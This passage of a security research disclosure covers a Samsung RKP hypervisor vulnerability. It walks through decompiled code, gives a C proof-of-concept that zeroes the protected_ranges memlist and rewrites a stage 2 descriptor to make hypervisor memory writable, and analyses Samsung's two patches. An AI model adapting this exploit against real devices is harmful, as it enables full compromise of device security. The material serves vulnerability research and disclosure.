    if ((*table_desc_p & 3) == 3) {
      set_rox_bits_of_desc(table_desc_p, 3);
    }
  }
  rkp_phys_map_unlock(table);
  return 0;
}

rkp_set_range_to_rox is also always called (from the "dynamic load" feature's functions) on swapper_pg_dir. It will thus walk the kernel page tables (stage 1) and change the memory attributes of the block and page descriptor spanning over the specified address range to make them read-only executable. The call to rkp_s2_page_change_permission that we are interested in also only happens for level 3 tables, but only if they are not marked KERNEL|L3 in the physmap.

It is not a good option either for us for similar reasons: the target page is set as read-only in the stage 2, it requires having already written a user-controlled descriptor into the kernel page tables, and the "dynamic load" feature is only present on Exynos devices.

The Remaining Options

The last 2 functions that call rkp_s2_page_change_permission are rkp_set_pages_ro and rkp_ro_free_pages, which we have seen in the first blog post. Unfortunately, they give it as an argument an address that comes from a call to rkp_get_pa, so they are unusable for our exploit.

Finally, rkp_s2_range_change_permission, the function operating on an address range, is called from many dynamic_load_xxx functions, but the "dynamic load" feature is only available on Exynos devices, and we would like to keep the exploit as generic as possible.

Remapping Our Target Page

To exploit the vulnerability, we decided to use rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd. As mentioned previously, because these functions call rkp_l1pgt_process_table with a physical address returned by rkp_get_pa, we will be targeting the rkp_s2_range_change_permission call in rkp_l2pgt_process_table instead. To reach it, we need to give a "fake PGD" that contains a single descriptor pointing to a "fake PMD" (that will be overlapping with our target page in hypervisor memory) as input to the rkp_l1pgt_process_table function.

  +------------------+  .-> +------------------+
  |                  |  |   |                  |
  +------------------+  |   +------------------+
  | table descriptor ---'   |                  |
  +------------------+      +------------------+
  |                  |      |                  |
  +------------------+      +------------------+
  |                  |      |                  |
  +------------------+      +------------------+

       "fake PMD"                "fake PUD"
    in kernel memory        in hypervisor memory

The first step of the exploit is to call the rkp_cmd_new_pgd command handler, which simply calls rkp_l1pgt_new_pgd. It itself calls rkp_l1pgt_process_table, which will process our "fake PGD" (in the code below, high_bits will be 0 and is_alloc will be 1). Most specifically, it will set our "fake PMD" as L1 in physmap, set it as read-only in the stage 2, then call rkp_l2pgt_process_table to process our "fake PMD".

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pgd);
  // If we are introducing this PGD.
  if (is_alloc) {
    // If it is already marked as a PGD in the physmap, return without processing it.
    if (is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // ...
    // And mark the PGD as such in the physmap.
    res = rkp_phys_map_set(pgd, type /* L1 */);
    // ...
    // Make the PGD read-only in the second stage.
    res = rkp_s2_page_change_permission(pgd, 0x80 /* read-only */, 0 /* non-executable */, 0);
    // ...
  }
  // ...
  // Now iterate over each descriptor of the PGD.
  do {
    // ...
    // Block descriptor (not a table, not invalid).
    if ((desc & 0b11) != 0b11) {
      if (desc) {
        // Make the memory non executable at EL1.
        set_pxn_bit_of_desc(desc_p, 1);
      }
    }
    // Table descriptor.
    else {
      addr = start_addr & 0xffffff803fffffff | offset;
      // Call rkp_l2pgt_process_table to process the PMD.
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      // ...
      // Make the memory non executable at EL1 for user PGDs.
      set_pxn_bit_of_desc(desc_p, 1);
    }
    // ...
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l2pgt_process_table process our "fake PGD", it marks it as L2 in the PHYSMAP, sets it as read-only in the stage 2 page tables, then calls check_single_l2e on each of its entries (that we don't have control over).

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pmd);
  // // If we are introducing this PMD.
  if (is_alloc) {
    // If it is not marked as a PMD in the physmap, return without processing it.
    if (is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // ...
    // And mark the PMD as such in the physmap.
    res = rkp_phys_map_set(pmd, type /* L2 */);
    // ...
    // Make the PMD read-only in the second stage.
    res = rkp_s2_page_change_permission(pmd, 0x80 /* read-only */, 0 /* non-executable */, 0);
    // ...
  }
  // ...
  // Now iterate over each descriptor of the PMD.
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    // Call `check_single_l2e` on each descriptor.
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pgd);
  return res;
}

check_single_l2e will set the PXN bit of the descriptor (which in our case is each 8-byte value in our target page) and will also process values that look like table descriptors. That's something we will need to keep in mind when choosing our target page in hypervisor memory.

int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
  // ...
  // The virtual address is not executable, set the PXN bit of the descriptor.
  set_pxn_bit_of_desc(desc_p, 2);
  // ...
  // Get the descriptor type.
  desc = *desc_p;
  type = *desc & 0b11;
  // Block descriptor, return without processing it.
  if (type == 0b01) {
    return 0;
  }
  // Invalid descriptor, return without processing it.
  if (type != 0b11) {
    if (desc) {
      uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
    }
    return 0;
  }
  // ...
  // Call rkp_l3pgt_process_table to process the PT.
  return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}

Up to this point, we have gotten our target page marked as L2 in the physmap, and remapped as read-only in the stage 2 page tables. That's great, but to be able to modify it from the kernel, we need to have it mapped as writable in the second stage.

The second step of the exploit is to call the rkp_cmd_free_pgd command handler, which simply calls rkp_l1pgt_free_pgd. It itself calls rkp_l1pgt_process_table, which once again will process our "fake PGD" (in the code below, high_bits will be 0 and is_alloc will this time be 0). More specifically, it will set our "fake PGD" as FREE in the physmap, set it as read-write in the stage 2, then call rkp_l2pgt_process_table to process our "fake PMD".

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pgd);
  // ...
  // If we are retiring this PGD.
  if (!is_alloc) {
    // If it is not marked as a PGD in the physmap, return without processing it.
    if (!is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // Mark the PGD as `FREE` in the physmap.
    res = rkp_phys_map_set(pgd, FREE);
    // ...
    // // Make the PGD writable in the second stage.
    res = rkp_s2_page_change_permission(pgd, 0 /* writable */, 1 /* executable */, 0);
    // ...
  }
  // Now iterate over each descriptor of the PGD.
  offset = 0;
  entry = 0;
  start_addr = high_bits << 39;
  do {
    // Block descriptor (not a table, not invalid).
    if ((desc & 0b11) != 0b11) {
      if (desc) {
        // Make the memory non executable at EL1.
        set_pxn_bit_of_desc(desc_p, 1);
      }
    } else {
      addr = start_addr & 0xffffff803fffffff | offset;
      // Call rkp_l2pgt_process_table to process the PMD.
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      // ...
      // Make the memory non executable at EL1 for user PGDs.
      set_pxn_bit_of_desc(desc_p, 1);
    }
    // ...
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l2pgt_process_table process our "fake PGD", it marks it as FREE in the physmap, sets it as read-write in the stage 2 page tables, then calls check_single_l2e again on each of its entries (that will do the same as before).

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pmd);
  // ...
  // If we are retiring this PMD.
  if (!is_alloc) {
    // If it is not marked as a PMD in the physmap, return without processing it.
    if (!is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // ...
    // Mark the PMD as `FREE` in the physmap.
    res = rkp_phys_map_set(pmd, FREE);
    // ...
    // Make the PMD writable in the second stage.
    res = rkp_s2_page_change_permission(pmd, 0 /* writable */, 1 /* executable */, 0);
    // ...
  }
  // Now iterate over each descriptor of the PMD.
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    // Call `check_single_l2e` on each descriptor.
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pgd);
  return res;
}

We have finally gotten our target page remapped as writable in the stage 2 page tables. Perfect, now we need to find a target page that will not make the hypervisor crash when its contents are processed by the check_single_l2e function.

Choosing A Target Page

Because check_single_l2e sets the PXN bit of the "fake PUD" descriptors (i.e. the content of our target page) and further processes values that look like table descriptors, we cannot directly target pages located in RKP's code segment. Our target must be writable from EL2, which is the case for RKP's page tables (either the stage 2 page tables for EL1 or the page tables for EL2). But by virtue of being page tables, they contain valid descriptors, so they are very likely to make RKP or the kernel crash at some point as the result of this processing. That is why we didn't target them.

Instead, we chose to target the memory page backing the protected_ranges memlist, which is the page that contains all its memlist_entry_t instances. It contains values that are always aligned on 8 bytes, so they look like invalid descriptors to the check_single_l2e function. And by nullifying this list from the kernel, we would then be able to provide addresses inside hypervisor memory to all the command handlers.

This protected_ranges memlist is allocated in the pa_restrict_init function:

int64_t pa_restrict_init() {
  // Initialize the memlist of protected ranges.
  memlist_init(&protected_ranges);
  // Add the uH memory region to it (containing the hypervisor code and data).
  memlist_add(&protected_ranges, 0x87000000, 0x200000);
  // ...
}

To know precisely where the memory backing this memlist will be allocated, we need to dig into the memlist_init function. It preallocates enough space for 5 entries (the default capacity) by calling the memlist_reserve function before initializing the structure's fields.

int64_t memlist_init(memlist_t* list) {
  // ...
  // Reset the structure fields.
  memset(list, 0, sizeof(memlist_t));
  // By default, preallocate space for 5 entries.
  res = memlist_reserve(list, 5);
  // Fill the structure fields accordingly.
  list->capacity = 5;
  list->merged = 0;
  list->unkn_14 = 0;
  cs_init(&list->cs);
  return res;
}

It turns out the protected_ranges memlist never stores more than 5 memory regions, even with the memory backing the physmap being added to it. Thus, it never gets reallocated, and there's only ever one allocation made. Now let's see what the memlist_reserve function does. It allocates space for the specified number of memlist_entry entries and copies the old entries to the newly allocated memory, if there were any.

int64_t memlist_reserve(memlist_t* list, uint64_t size) {
  // ...

  // Sanity-check the arguments.
  if (!list || !size) {
    return -1;
  }
  // Allocate memory for `size` entries of type `memlist_entry`.
  base = heap_alloc(0x20 * size, 0);
  if (!base) {
    return -1;
  }
  // Reset the memory that was just allocated.
  memset(base, 0, 0x20 * size);
  // If the list already contains some entries.
  if (list->base) {
    // Copy these entries from the old array to the new one.
    for (index = 0; index < list->count; ++index) {
      new_entry = &base[index];
      old_entry = &list->base[index];
      new_entry->addr = old_entry->addr;
      new_entry->size = old_entry->size;
      new_entry->unkn_10 = old_entry->unkn_10;
      new_entry->extra = old_entry->extra;
    }
    // And free the old memory.
    heap_free(list->base);
  }
  list->base = base;
  return 0;
}

The memory is allocated by memlist_reserve by calling heap_alloc, so it comes from the "static heap" allocator. In pa_restrict_init, when the allocation for protected_ranges memlist is made, the "static region" contains:

  • the complete hypervisor memory: 0x87000000-0x87200000;
  • minus the log region: 0x87100000-0x87140000;
  • minus the uH/RKP region: 0x87000000-0x87046000;
  • minus the "bigdata" region: 0x870FF000-0x87100000.

So we know the address returned by the allocator should be somewhere after 0x87046000 (i.e. between the uH/RKP and "bigdata" regions). To know at which address exactly it will be, we need to find all the allocations that are performed before pa_restrict_init is called.

By carefully tracing the execution statically, we find 4 "static heap" allocations:

  • The first allocation of size 0x8A happens in rkp_init_cmd_counts;
  • The second allocation of size 0x230 happens in uh_init_bigdata;
  • The third allocation of size 0x1000 happens in uh_init_context;
  • The fourth allocation of size 0xA0 comes from the memlist_init(&dynamic_regions) call in uh_init.
int64_t uh_init(int64_t uh_base, int64_t uh_size) {
  // ...
  apps_init();
  uh_init_bigdata();
  uh_init_context();
  memlist_init(&uh_state.dynamic_regions);
  pa_restrict_init();
  // ...
}
uint64_t apps_init() {
  // ...
  res = uh_handle_command(i, 0, &saved_regs);
  // ...
}
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
  // ...
  return cmd_handler(regs);
}
int64_t rkp_cmd_init() {
  // ...
  rkp_init_cmd_counts();
  // ...
}
uint8_t* rkp_init_cmd_counts() {
  // ...
  malloc(0x8a, 0);
  // ...
}
int64_t uh_init_bigdata() {
  if (!bigdata_state) {
    bigdata_state = malloc(0x230, 0);
  }
  memset(0x870ffc40, 0, 0x3c0);
  memset(bigdata_state, 0, 0x230);
  return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}
int64_t* uh_init_context() {
  // ...

  uh_context = malloc(0x1000, 0);
  if (!uh_context) {
    uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
  }
  return memset(uh_context, 0, 0x1000);
}

Now we are ready to calculate the address. Each allocation has a header of 0x18 bytes, and the allocator rounds up the total size to the next 8-byte boundary. By doing our math properly, we find that the physical address of the protected_ranges allocation is 0x870473D8:

>>> f = lambda x: (x + 0x18 + 7) & 0xFFFFFFF8
>>> 0x87046000 + f(0x8A) + f(0x230) + f(0x1000) + f(0xA0) + 0x18
0x870473D8

We also need to know what's in the same page (0x87047000) as the protected_ranges memlist. Thanks to our tracing of the prior allocations, we know that it is preceded by the uh_context, which is memset and only used on panics. Similarly, we can determine that it is followed by a memlist reallocation in init_cmd_add_dynamic_region and a stage 2 page table allocation in init_cmd_initialize_dynamic_heap with a page-sized padding. This means that there should be no value looking like a page table descriptor in this page (on our test device).

After making the page containing the protected_ranges memlist writable in the stage 2 using the rkp_cmd_new_pgd and rkp_cmd_free_pgd commands, we directly modify it from the kernel. Our goal is to make check_kernel_input always return 0 so that we can give arbitrary addresses (including addresses in hypervisor memory) to all command handlers. check_kernel_input calls protected_ranges_contains, which itself calls memlist_contains_addr. This function simply checks if the address is within any of the regions of the memlist.

int64_t memlist_contains_addr(memlist_t* list, uint64_t addr) {
  // ...
  cs_enter(&list->cs);
  // Iterate over each of the entries of the memlist.
  for (index = 0; index < list->count; ++index) {
    entry = &list->base[index];
    // If the address is within the start address and end address of the region.
    if (addr >= entry->addr && addr < entry->addr + entry->size) {
      cs_exit(&list->cs);
      return 1;
    }
  }
  cs_exit(&list->cs);
  return 0;
}

The first entry in protected_ranges is the hypervisor memory region. Zeroing its size field (at offset 8) should be enough to disable the blacklist.

Getting Code Execution

The final step to fully compromise the hypervisor is to get arbitrary code execution, which is fairly easy now that we can give any address to all command handlers. This can be achieved in multiple ways, but the simplest way is likely to modify the page tables of the stage 2 at EL1.

For example, we can target the level 2 descriptor that covers the memory range of the hypervisor and turn it into a writable block descriptor. The write itself can be performed by calling rkp_cmd_write_pgt3 (that calls rkp_l3pgt_write) since we have disabled the protected_ranges memlist.

To find the physical address of the target descriptor, we can dump the initial stage 2 page tables at EL1 using an IDAPython script:

import ida_bytes

def parse_static_s2_page_tables(table, level=1, start_vaddr=0):
    size = [0x8000000000, 0x40000000, 0x200000, 0x1000][level]

    for i in range(512):
        desc_addr = table + i * 8
        desc = ida_bytes.get_qword(desc_addr)
        if (desc & 0b11) == 0b00 or (desc & 0b11) == 0b01:
            continue
        paddr = desc & 0xFFFFFFFFF000
        vaddr = start_vaddr + i * size

        if level < 3 and (desc & 0b11) == 0b11:
            print("L%d Table for %016x-%016x is at %08x" \
                  % (level + 1, vaddr, vaddr + size, paddr))
            parse_static_s2_page_tables(paddr, level + 1, vaddr)

parse_static_s2_page_tables(0x87028000)

Below is the result of running this script on the binary running on our target device.

L2 Table for 0000000000000000-0000000040000000 is at 87032000
L3 Table for 0000000002000000-0000000002200000 is at 87033000
L2 Table for 0000000080000000-00000000c0000000 is at 8702a000
L2 Table for 00000000c0000000-0000000100000000 is at 8702b000
L2 Table for 0000000880000000-00000008c0000000 is at 8702c000
L2 Table for 00000008c0000000-0000000900000000 is at 8702d000
L2 Table for 0000000900000000-0000000940000000 is at 8702e000
L2 Table for 0000000940000000-0000000980000000 is at 8702f000
L2 Table for 0000000980000000-00000009c0000000 is at 87030000
L2 Table for 00000009c0000000-0000000a00000000 is at 87031000

We know that the L2 table that maps 0x80000000-0xc0000000 is located at 0x8702A000. To obtain the descriptor's address, which depends on the target address (0x87000000) and the size of a L2 block (0x200000), we simply need to add an offset to the address of the L2 table:

>>> 0x8702A000 + ((0x87000000 - 0x80000000) // 0x200000) * 8
0x8702A1C0

The descriptor's value is composed of the target address and the wanted attributes: 0x87000000 | 0x4FD = 0x870004FD.

0 1 00 11 1111 01 = 0x4FD
^ ^ ^  ^  ^    ^
| | |  |  |    `-- Type: block descriptor
| | |  |  `------- MemAttr[3:0]: NM, OWBC, IWBC
| | |  `---------- S2AP[1:0]: read/write
| | `------------- SH[1:0]: NS
| `--------------- AF: 1
`----------------- FnXS: 0

The descriptor is changed by calling rkp_cmd_write_pgt3, which calls rkp_l3pgt_write. Since we are writing to an existing page table that is marked as L3 in the physmap and the new value is a block descriptor, the check passes, and the write is performed in set_entry_of_pgt.

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...
  // Convert the PT descriptor PA into a VA.
  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  // If the PT is marked as such in the physmap, or as `FREE`.
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    // If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
    if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
      allowed = 1;
    }
    // Otherwise, the check fails if RKP is deferred initialized.
    else {
      allowed = rkp_deferred_inited == 0;
    }
  }
  // If the PT is marked as something else, the check also fails.
  else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  // If the check failed, trigger a policy violation.
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  // Otherwise, perform the write of the PT descriptor on behalf of the kernel.
  return set_entry_of_pgt(ptep_pa, pte_val);
}
uint64_t* set_entry_of_pgt(uint64_t* ptr, uint64_t val) {
  *ptr = val;
  return ptr;
}

Proof of Concept

This simple proof of concept assumes that we have obtained kernel memory read/write primitives and can make hypervisor calls.

#define UH_APP_RKP 0xC300C002

#define RKP_CMD_NEW_PGD    0x0A
#define RKP_CMD_FREE_PGD   0x09
#define RKP_CMD_WRITE_PGT3 0x05

#define PROTECTED_RANGES_BITMAP 0x870473D8
#define BLOCK_DESC_ADDR         0x8702A1C0
#define BLOCK_DESC_DATA         0x870004FD

uint64_t pa_to_va(uint64_t va) {
    return pa - 0x80000000UL + 0xFFFFFFC000000000UL;
}

void exploit() {
    /* allocate and clear our "fake PGD" */
    uint64_t pgd = kernel_alloc(0x1000);
    for (uint64_t i = 0; i < 0x1000; i += 8)
        kernel_write(pgd + i, 0UL);

    /* write our "fake PMD" descriptor */
    kernel_write(pgd, (PROTECTED_RANGES_BITMAP & 0xFFFFFFFFF000UL) | 3UL);

    /* make the hyp call that will set the page RO */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_NEW_PGD, pgd);
    /* make the hyp call that will set the page RW */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_FREE_PGD, pgd);

    /* zero out the "protected ranges" first entry */
    kernel_write(pa_to_va(PROTECTED_RANGES_BITMAP + 8), 0UL);

    /* write the descriptor to make hyp memory writable */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3,
                    pa_to_va(BLOCK_DESC_ADDR), BLOCK_DESC_DATA);
}

The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1. The two-fold bug appeared to be present in the binaries of both Exynos and Snapdragon devices, including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled. In particular, on Snapdragon devices, the s2_map function (called from rkp_s2_page_change_permission and rkp_s2_range_change_permission) makes an indirect call to a QHEE function (since it is QHEE that is in charge of the stage 2 page tables). We did not follow this call to see if it made any additional checks that could prevent the exploitation of this vulnerability. On the Galaxy S20, there is also an indirect call to the new hypervisor framework (called H-Arx), which we did not follow either.

The memory layout will also be different on other devices than the one we have targeted in the exploit, so the hard-coded addresses won't work. But we believe that they can be adapted or that an alternative exploitation strategy can be found for these devices.

Patch

Here are the immediate remediation steps we suggested to Samsung:

- Mark the pages unmapped by s2_unmap as S2UNMAP in the physmap
- Perform the additional checks of rkp_s2_page_change_permission in
rkp_s2_range_change_permission as well
- Add calls to check_kernel_input in the rkp_lxpgt_process_table functions

First Patch

After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3.

The first changes were made to the rkp_s2_page_change_permission function. It now takes a type argument that it will use to mark the page in the physmap, regardless of whether the checks pass or fail. In addition, for read-only permissions, the changes to the physmap and ro_bitmap are made prior to changing the stage 2 page tables, and after for read-write permissions.

int64_t rkp_s2_page_change_permission(void* p_addr,
                                      uint64_t access,
+                                      uint32_t type,
                                      uint32_t exec,
                                      uint32_t allow) {
  // ...

  if (!allow && !rkp_inited) {
    // ...
-    return -1;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  }
  if (is_phys_map_s2unmap(p_addr)) {
    // ...
-    return -1;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  }
  if (page_allocator_is_allocated(p_addr) == 1
        || (p_addr >= TEXT_PA && p_addr < ETEXT_PA)
        || (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA))
-    return 0;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  // ...
+  if (access == 0x80) {
+    if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+      return -1;
+  }
  if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
    rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
    return -1;
  }
  tlbivaae1is(((p_addr + 0x80000000) | 0xFFFFFFC000000000) >> 12);
-  return rkp_set_pgt_bitmap(p_addr, access);
+  if (access != 0x80)
+    if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+      return -1;
+  return 0;

Surprisingly, no changes were made to the rkp_s2_range_change_permission function. So far, none of the changes prevent using these two functions to remap previously unmapped memory.

The second set of changes were to the rkp_l1pgt_process_table, rkp_l2pgt_process_table, and rkp_l3pgt_process_table functions. In each of these functions, a call to check_kernel_input has been added in the allocation path before changing the stage 2 permissions of the page.

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pgd);
    // ...
  } else {
    // ...
  }
  // ...
}
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pmd);
    // ...
  } else {
    // ...
  }
}
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pte);
    // ...
  } else {
    // ...
  }
  // ...
}

These changes make it so that we can no longer use the specific code path implemented in our exploit to call rkp_s2_page_change_permission. However, it doesn't prevent any of the other ways to call this function that we presented earlier.

We were unable to find a change that fixes the actual issue, which is that pages unmapped in the stage 2 are not marked as S2UNMAP in the physmap. To demonstrate to Samsung that their fix was not sufficient, we started looking for a new exploitation strategy. While we were, unfortunately, unable to test it on a real device due to a lack of time, we devised the theoretical approach explained below.

Finding A New Exploit Path

In the Exploring Our Options section, we mentioned that the set_range_to_rox_l3 and set_range_to_pxn_l3 functions can be used to reach a call to rkp_s2_page_change_permission, but with two major caveats. First, to call them with our target page, we need a table descriptor in a kernel PMD to point to our target page. Furthermore, they are part of the "dynamic load" feature that is only available on Exynos devices.

However, if we are able to call these functions, we can easily make our target page writable in the second stage. We can first call set_range_to_rox_l3 to mark our target page KERNEL|L3 in the physmap but also make it read-only in the second stage. We can then call set_range_to_pxn_l3, which requires it to be marked KERNEL|L3 in physmap but also makes it writable in the second stage.

Writing The Kernel Page Tables

Our new strategy requires our target page to be pointed to by a table descriptor of a kernel PMD. This can be accomplished by changing an invalid descriptor into a table descriptor pointing to a "fake PT" that is actually our target page of hypervisor memory, as illustrated below.

                            |
  +--------------------+    |    +--------------------+  .-> +--------------------+
  |                    |    |    |                    |  |   |                    |
  +--------------------+    |    +--------------------+  |   +--------------------+
  | invalid descriptor |    |    |  table descriptor  ---'   |                    |
  +--------------------+    |    +--------------------+      +--------------------+
  |                    |    |    |                    |      |                    |
  +--------------------+    |    +--------------------+      +--------------------+
  |                    |    |    |                    |      |                    |
  +--------------------+    |    +--------------------+      +--------------------+
                            |
        read PMD            |           read PMD                    "fake PT"
     in kernel memory       |        in kernel memory         in hypervisor memory

Let's call the PA of the PMD descriptor pmd_desc_pa, the start VA of the region that it maps start_va, and the PA of our target page target_pa. To change the descriptor's value (from 0 to target_pa | 3), we can invoke the rkp_cmd_write_pgt2 command that calls rkp_l2pgt_write.

In rkp_l2pgt_write, since we are writing to an existing kernel PMD that is already marked as KERNEL|L2 in the physmap, the first check passes. And because the descriptor value changes from a zero to a non-zero value, it only calls check_single_l2e once, with the new descriptor value.

In check_single_l2e, by choosing a start_va not contained in the executable_regions, the PXN bit of the new descriptor value is set and protect is set to false. Then, because the new descriptor is a table, rkp_l3pgt_process_table is called.

In rkp_l3pgt_process_table, because protect is false, the function returns early.

Finally, back in rkp_l2pgt_write, the new value of the descriptor is written.

Remapping Memory As Writable

We are now ready to call the set_range_to_rox_l3 and set_range_to_pxn_l3 functions using the "dynamic load" commands that we will explain in the section about the next vulnerability. In particular, we use the subcommands dynamic_load_ins and dynamic_load_rm.

For reference, the code path that needs to be taken is as follows:

rkp_cmd_dynamic_load
`-- dynamic_load_ins
    |-- dynamic_load_check
    |     code range must be in the binary range
    |     must not overlap another "dynamic executable"
    |     must not be in the ro_bitmap
    |-- dynamic_load_protection
    |     will make the code range as RO (and add it to ro_bitmap)
    |-- dynamic_load_verify_signing
    |     if type != 3, no signature checking
    |-- dynamic_load_make_rox
    |     calls rkp_set_range_to_rox!
    |-- dynamic_load_add_executable
    |     code range added to the executable_regions
    `-- dynamic_load_add_dynlist
          code range added to the dynamic_load_regions

rkp_cmd_dynamic_load
`-- dynamic_load_rm
    |-- dynamic_load_rm_dynlist
    |     code range is removed from dynamic_load_regions
    |-- dynamic_load_rm_executable
    |     code range is removed from executable_regions
    |-- dynamic_load_set_pxn
    |     calls rkp_set_range_to_pxn!
    `-- dynamic_load_rw
          will make the code range as RW (and remove it from ro_bitmap)

It should be noted that, similarly to the original exploitation path, values in the target page that look like valid PT descriptors will have their PXN bit set. Thus, the target page needs to be writable. Nevertheless, we can continue to target the memory backing the protected_ranges bitmap.

Second Patch

After being notified a second time by Samsung that the vulnerability was patched, we downloaded and binary diffed the most recent firmware update available for the Samsung Galaxy S10. The exact version used was G973FXXSEFUJ2.

Changes were made to the rkp_s2_page_change_permission function. It now calls check_kernel_input to ensure the physical address of the page is not in the protected_ranges memlist. This prevents targeting hypervisor memory with this function.

int64_t rkp_s2_page_change_permission(void* p_addr,
                                      uint64_t access,
-                                      uint32_t exec,
-                                      uint32_t allow) {
+                                      uint32_t exec) {
  // ...

-  if (!allow && !rkp_inited) {
+  if (!rkp_deferred_inited) {
    // ...
  }
+  check_kernel_input(p_addr);
  // ...
}

This time, changes were also made to rkp_s2_range_change_permission. First, it calls protected_ranges_overlaps to ensure that the range does not overlap with the protected_ranges memlist. It then also ensures that none of the target pages are marked as S2UNMAP in the physmap.

int64_t rkp_s2_range_change_permission(uint64_t start_addr,
                                       uint64_t end_addr,
                                       uint64_t access,
                                       uint32_t exec,
                                       uint32_t allow) {
  // ...
-  if (!allow && !rkp_inited) {
-    uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
-    rkp_policy_violation("Range change permission prohibited");
-  } else if (allow != 2 && rkp_deferred_inited) {
-    uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
-    rkp_policy_violation("Range change permission prohibited");
-  }
+  if (rkp_deferred_inited) {
+    if (allow != 2) {
+      uh_log('L', "rkp_paging.c", 643, "RKP_33605b63");
+      rkp_policy_violation("Range change permission prohibited");
+    }
+    if (start_addr > end_addr) {
+      uh_log('L', "rkp_paging.c", 650, "RKP_b3952d08%llxRKP_dd15365a%llx",
+             start_addr, end_addr - start_addr);
+      rkp_policy_violation("Range change permission prohibited");
+    }
+    protected_ranges_overlaps(start_addr, end_addr - start_addr);
+    addr = start_addr;
+    do {
+      rkp_phys_map_lock(addr);
+      if (is_phys_map_s2unmap(addr))
+        rkp_policy_violation("RKP_1b62896c %p", addr);
+      rkp_phys_map_unlock(addr);
+      addr += 0x1000;
+    } while (addr < end_addr);
+  }
  // ...
}

+int64_t protected_ranges_overlaps(uint64_t addr, uint64_t size) {
+    if (memlist_overlaps_range(&protected_ranges, addr, size)) {
+        uh_log('L', "pa_restrict.c", 122, "RKP_03f2763e%lx RKP_a54942c8%lx", addr, size);
+        return uh_log('D', "pa_restrict.c", 124, "RKP_03f2763e%lxRKP_c5d4b9a4%lx", addr, size);
+    }
+    return 0;
+}

Writing executable kernel pages

SVE-2021-20179 (CVE-2021-25416): Possible creating executable kernel page via abusing dynamic load functions

Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 5, 2021
Disclosure status: Privately disclosed.
